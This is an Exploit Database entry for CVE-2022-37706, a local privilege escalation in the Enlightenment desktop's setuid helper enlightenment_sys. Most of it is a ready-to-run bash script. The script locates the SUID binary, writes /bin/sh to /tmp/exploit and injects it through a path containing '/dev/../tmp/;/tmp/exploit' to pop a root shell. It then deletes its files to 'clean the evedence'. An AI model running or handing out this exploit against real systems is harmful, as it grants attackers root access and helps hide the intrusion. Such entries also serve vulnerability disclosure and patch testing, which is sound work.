Enlightenment v0.25.3 – Privilege escalation

• Exploit Database
• 11 阅读

• 作者： nu11secur1ty
  日期： 2023-04-01
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/51180/

• ## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
  ## Author: nu11secur1ty
  ## Date: 12.26.2022
  ## Vendor: https://www.enlightenment.org/
  ## Software: https://www.enlightenment.org/download
  ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
  ## CVE ID: CVE-2022-37706
  ## Description:
  The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
  Enlightenment_sys in Enlightenment before 0.25.3 allows local users to
  gain privileges because it is setuid root,
  and the system library function mishandles pathnames that begin with a
  /dev/.. substring
  If the attacker has access locally to some machine on which the
  machine is installed Enlightenment
  he can use this vulnerability to do very dangerous stuff.
  
  ## STATUS: CRITICAL Vulnerability
  
  ## Tested on:
  ```bash
  DISTRIB_ID=Ubuntu
  DISTRIB_RELEASE=22.10
  DISTRIB_CODENAME=kinetic
  DISTRIB_DESCRIPTION="Ubuntu 22.10"
  PRETTY_NAME="Ubuntu 22.10"
  NAME="Ubuntu"
  VERSION_ID="22.10"
  VERSION="22.10 (Kinetic Kudu)"
  VERSION_CODENAME=kinetic
  ID=ubuntu
  ID_LIKE=debian
  HOME_URL="https://www.ubuntu.com/"
  SUPPORT_URL="https://help.ubuntu.com/"
  BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
  PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
  UBUNTU_CODENAME=kinetic
  LOGO=ubuntu-logo
  ```
  
  [+] Exploit:
  
  ```bash
  #!/usr/bin/bash
  # Idea by MaherAzzouz
  # Development by nu11secur1ty
  
  echo "CVE-2022-37706"
  echo "[*] Trying to find the vulnerable SUID file..."
  echo "[*] This may take few seconds..."
  
  # The actual problem
  file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
  if [[ -z ${file} ]]
  then
  	echo "[-] Couldn't find the vulnerable SUID file..."
  	echo "[*] Enlightenment should be installed on your system."
  	exit 1
  fi
  
  echo "[+] Vulnerable SUID binary found!"
  echo "[+] Trying to pop a root shell!"
  mkdir -p /tmp/net
  mkdir -p "/dev/../tmp/;/tmp/exploit"
  
  echo "/bin/sh" > /tmp/exploit
  chmod a+x /tmp/exploit
  echo "[+] Welcome to the rabbit hole :)"
  
  ${file} /bin/mount -o
  noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
  "/dev/../tmp/;/tmp/exploit" /tmp///net
  
  read -p "Press any key to clean the evedence..."
  echo -e "Please wait... "
  
  sleep 5
  rm -rf /tmp/exploit
  rm -rf /tmp/net
  echo -e "Done; Everything is clear ;)"
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
  ## Proof and Exploit:
  [href](https://streamable.com/zflbgg)
  
  ## Time spent
  `01:00:00`
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>